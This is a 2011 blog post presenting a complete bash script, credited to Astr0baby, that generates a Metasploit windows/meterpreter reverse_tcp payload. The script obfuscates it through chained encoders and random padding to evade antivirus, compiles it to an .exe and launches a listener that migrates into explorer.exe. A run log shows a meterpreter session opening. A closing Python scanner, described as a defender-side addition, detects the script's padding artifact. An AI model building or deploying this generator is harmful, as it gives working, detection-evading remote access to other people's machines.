Sunday, November 13, 2011

FUD Payload Generator for Backtrack

Today, based on Astr0baby's article on creating a fully undetectable Metasploit payload, I modified his REVERSE_TCP payload generator so that it works on the BackTrack 5 distribution. Below you can find the modified version and a short walkthrough of how it works:
#!/bin/bash
echo "************************************************************"
echo "    Automatic  shellcode generator - FOR METASPLOIT         "
echo "                  By Astr0baby 2011                         "
echo "  With some Randomic gravy and sauce to bypass Antivirus    "  
echo "    For Automatic Teensy programming and deployment         "
echo "************************************************************"
rm -rf ShellCode
 
echo "Here is a network device list available on yor machine"
cat /proc/net/dev | tr -s  ' ' | cut -d ' ' -f1,2 | sed -e '1,2d'
echo -e "What network interface are we gonna use ?  \c"
read interface
echo -e "What Port Number are we gonna listen to? : \c"
read port
echo -e "Please enter a random seed number 1-10000, the larger the number the larger the resulting executable : \c"
read seed
echo -e "And lastly how many times do we want to encode our payloads 1-20? : \c"
read enumber
# Get OS name
OS=`uname`
IP="" # store IP
case $OS in
   Linux) IP=`ifconfig $interface  | grep 'inet addr:'| grep -v '127.0.0.1' | cut -d: -f2 | awk '{ print $1}'`;;
   *) IP="Unknown";;
esac
#echo "$IP"
./msfpayload windows/meterpreter/reverse_tcp LHOST=$IP LPORT=$port EXITFUNC=thread R | ./msfencode -e x86/shikata_ga_nai -c $enumber -t raw | ./msfencode -e x86/jmp_call_additive -c $enumber -t raw | ./msfencode -e x86/call4_dword_xor -c $enumber -t raw |  ./msfencode -e x86/shikata_ga_nai -c $enumber  > test.c  
mkdir ShellCode
mv test.c ShellCode
cd ShellCode
#Replacing plus signs at the end of line
sed -e 's/+/ /g' test.c > clean.c
sed -e 's/buf = /unsigned char micro[]=/g' clean.c > ready.c
echo "#include <stdio.h>" >> temp
echo 'unsigned char ufs[]=' >> temp
for (( i=1; i<=10000;i++ )) do echo $RANDOM $i; done | sort -k1| cut -d " " -f2| head -$seed >> temp2
sed -i 's/$/"/' temp2
sed -i 's/^/"/' temp2  
echo  ';' >> temp2  
cat temp2 >> temp
cat ready.c >> temp
mv temp ready2.c
echo ";" >> ready2.c
echo "int main(void) { ((void (*)())micro)();}" >> ready2.c  
mv ready2.c final.c
echo 'unsigned char tap[]=' > temp3
for (( i=1; i<=999999;i++ )) do echo $RANDOM $i; done | sort -k1| cut -d " " -f2| head -$seed >> temp4
sed -i 's/$/"/' temp4
sed -i 's/^/"/' temp4
echo  ';' >> temp4
cat temp4 >> temp3
cat temp3 >> final.c  
#Cleanup
rm -f clean.c
rm -f test.c
rm -f ready.c
rm -f rand.c
rm -f temp2
rm -f temp3
rm -f temp4 
 
/usr/bin/i586-mingw32msvc-gcc -Wall ./final.c -o ./final.exe > /dev/null 2>&1
mv final.exe $RANDOM.exe
filex=`ls -ct1 | head -1`
sumx=`sha1sum $filex`
echo $filex "...generated in ShellCode subfolder"
echo $filex "sha1checksum is .." $sumx  
strip --strip-debug $filex
cd ..
echo "      starting the meterpreter listener..."
sleep 2
./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=$IP LPORT=$port AutoRunScript=' migrate2  explorer.exe'  E
In order to be able to compile the generated payload we must install the following packages:

root@bt:~# apt-get install mingw32-runtime mingw-w64 mingw gcc-mingw32 mingw32-binutils
After the installation we move our shell script into the default Metasploit folder (/pentest/exploits/framework) and execute it:
root@bt:/pentest/exploits/framework# chmod +x fud.sh 
root@bt:/pentest/exploits/framework# ./fud.sh 
************************************************************
    Automatic  shellcode generator - FOR METASPLOIT         
                  By Astr0baby 2011                        
  With some Randomic gravy and sauce to bypass Antivirus    
    For Automatic Teensy programming and deployment         
************************************************************
Here is a network device list available on yor machine
 lo:
 eth0:
What network interface are we gonna use ?  eth0
What Port Number are we gonna listen to? : 443
Please enter a random seed number 1-10000, the larger the number the larger the resulting executable : 6000
And lastly how many times do we want to encode our payloads 1-20? : 5
[*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 344 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 371 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 398 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 425 (iteration=5)
[*] x86/jmp_call_additive succeeded with size 457 (iteration=1)
[*] x86/jmp_call_additive succeeded with size 489 (iteration=2)
[*] x86/jmp_call_additive succeeded with size 521 (iteration=3)
[*] x86/jmp_call_additive succeeded with size 553 (iteration=4)
[*] x86/jmp_call_additive succeeded with size 585 (iteration=5)
[*] x86/call4_dword_xor succeeded with size 614 (iteration=1)
[*] x86/call4_dword_xor succeeded with size 642 (iteration=2)
[*] x86/call4_dword_xor succeeded with size 670 (iteration=3)
[*] x86/call4_dword_xor succeeded with size 698 (iteration=4)
[*] x86/call4_dword_xor succeeded with size 726 (iteration=5)
[*] x86/shikata_ga_nai succeeded with size 753 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 780 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 807 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 834 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 861 (iteration=5)
 
20210.exe ...generated in ShellCode subfolder
20210.exe sha1checksum is .. c69699927e61dbef37423c852cebcd40f883df2b 20210.exe
      starting the meterpreter listener...
Now that we have created our payload, we check whether it works:
root@bt:/pentest/exploits/framework/ShellCode# wine 24382.exe 
fixme:system:SetProcessDPIAware stub!
fixme:dwmapi:DwmIsCompositionEnabled 0x33cfdc
fixme:file:MoveFileWithProgressW MOVEFILE_WRITE_THROUGH unimplemented
fixme:advapi:SetNamedSecurityInfoW L"C:\\windows\\system32\\gecko\\1.0.0\\wine_gecko\\components\\xpti.dat" 1 536870916 (nil) (nil) 0x1b3d42c (nil)
fixme:iphlpapi:NotifyAddrChange (Handle 0xa62e8d8, overlapped 0xa62e8e0): stub
fixme:file:MoveFileWithProgressW MOVEFILE_WRITE_THROUGH unimplemented
fixme:advapi:SetNamedSecurityInfoW L"C:\\windows\\system32\\gecko\\1.0.0\\wine_gecko\\components\\compreg.dat" 1 536870916 (nil) (nil) 0x1c18b0c (nil)
wine: configuration in '/root/.wine' has been updated.
fixme:toolhelp:CreateToolhelp32Snapshot Unimplemented: heap list snapshot
fixme:toolhelp:Heap32ListFirst : stub
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.200.22
LPORT => 443
AutoRunScript => migrate2 explorer.exe
[*] Started reverse handler on 192.168.200.22:443 
[*] Starting the payload handler...
[*] Sending stage (752128 bytes) to 192.168.200.22
[*] Meterpreter session 1 opened (192.168.200.22:443 -> 192.168.200.22:55865) at 2011-11-09 22:48:24 +0200
 
meterpreter > ps
 
Process list
============
 
 PID  Name            Arch  Session  User                      Path
 ---  ----            ----  -------  ----                      ----
 12   services.exe    x86   0        NT AUTHORITY\INTERACTIVE  C:\windows\system32\services.exe
 17   explorer.exe    x86   0        NT AUTHORITY\INTERACTIVE  C:\windows\system32\explorer.exe
 33   winedevice.exe  x86   0        NT AUTHORITY\INTERACTIVE  C:\windows\system32\winedevice.exe
 8    24382.exe       x86   0        NT AUTHORITY\INTERACTIVE  Z:\pentest\exploits\framework\ShellCode\24382.exe
 
meterpreter > sysinfo
Computer        : bt
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
Our payload is now fully undetectable by most antivirus engines. Of course, we can also scan it with an online service such as NoVirusThanks:
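"Undetectable" here means that signature-based engines of the day did not match the encoded decoder stub; the generator still leaves a structural trace a defender can key on. The script fills the ufs[] and tap[] arrays with `seed` random decimal numbers, one quoted string literal per line, and the C compiler concatenates adjacent literals, so the compiled .exe carries two unusually long runs of ASCII digits in its data section. The following Python scanner is an added defender-side example, not code from the original post or from Astr0baby; the run-length threshold, the number of runs, and the constructed sample blobs are assumptions made for illustration.

```python
"""
Heuristic scanner for the padding artifact left by the generator above.
The ufs[] and tap[] arrays are built from `seed` random decimal numbers,
one quoted string literal per line; since the compiler concatenates
adjacent literals, the compiled binary carries two long runs of ASCII
digits. Added defender-side example, not part of the original post;
the thresholds below are assumptions and should be tuned per corpus.
"""
import random
import re
import sys

# Ordinary PE data (version strings, timestamps, GUIDs) holds digit runs of a
# few dozen bytes at most, so a run this long is unusual. Assumed threshold.
MIN_DIGIT_RUN = 512
MIN_RUNS = 2  # the generator emits two padded arrays, ufs[] and tap[]


def digit_runs(data: bytes, min_len: int = MIN_DIGIT_RUN):
    """Return (offset, length) for every run of at least min_len ASCII digits."""
    pattern = re.compile(rb"[0-9]{%d,}" % min_len)
    return [(m.start(), m.end() - m.start()) for m in pattern.finditer(data)]


def looks_like_padded_stub(data: bytes, min_len: int = MIN_DIGIT_RUN,
                           min_runs: int = MIN_RUNS) -> bool:
    """True when the blob carries at least min_runs long digit runs."""
    return len(digit_runs(data, min_len)) >= min_runs


def build_padding(count: int, upper: int, rng_seed: int) -> bytes:
    """Constructed stand-in for the shell loop
    `for i in 1..upper: echo $RANDOM $i | sort | cut -f2 | head -count`:
    `count` distinct indices from 1..upper in random order, rendered as
    digits with no separators, which is how the concatenated C literals
    end up in the binary."""
    rng = random.Random(rng_seed)
    picked = rng.sample(range(1, upper + 1), count)
    return "".join(str(n) for n in picked).encode("ascii")


def constructed_sample(seed: int, rng_seed: int = 7) -> bytes:
    """Constructed byte layout mimicking the compiled output (not a real PE):
    header bytes, the ufs[] padding, an opaque stub of random filler bytes
    standing in for micro[], then the tap[] padding, each NUL-terminated."""
    rng = random.Random(rng_seed)
    header = b"MZ" + bytes(range(256)) * 2
    stub = bytes(rng.getrandbits(8) for _ in range(300))  # random filler, not code
    return (header
            + build_padding(seed, 10000, rng_seed) + b"\x00"
            + stub + b"\x00"
            + build_padding(seed, 999999, rng_seed + 1) + b"\x00")


def benign_sample() -> bytes:
    """Constructed blob carrying only the short digit runs normal binaries have."""
    return (b"MZ" + b"\x90" * 64
            + b"ProductVersion 1.0.0.2011\x00BuildDate 20111113\x00"
            + bytes(range(256)) * 4)


def scan_file(path: str) -> bool:
    """Scan a file on disk; True when it shows the padding artifact."""
    with open(path, "rb") as fh:
        return looks_like_padded_stub(fh.read())


if __name__ == "__main__":
    if len(sys.argv) > 1:
        for p in sys.argv[1:]:
            print(p, "suspicious" if scan_file(p) else "clean")
    else:
        print("constructed sample:", looks_like_padded_stub(constructed_sample(6000)))
        print("benign sample:", looks_like_padded_stub(benign_sample()))
```

Run it with one or more file paths to get a verdict per file, or with no arguments to see the constructed sample flagged and the benign sample pass. The heuristic is deliberately narrow: it catches the padding trick this particular script uses, not the encoded stub itself, which is why a defender would pair it with behavioural telemetry such as the process migration into explorer.exe that the AutoRunScript above performs.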

Credits go to Astr0baby
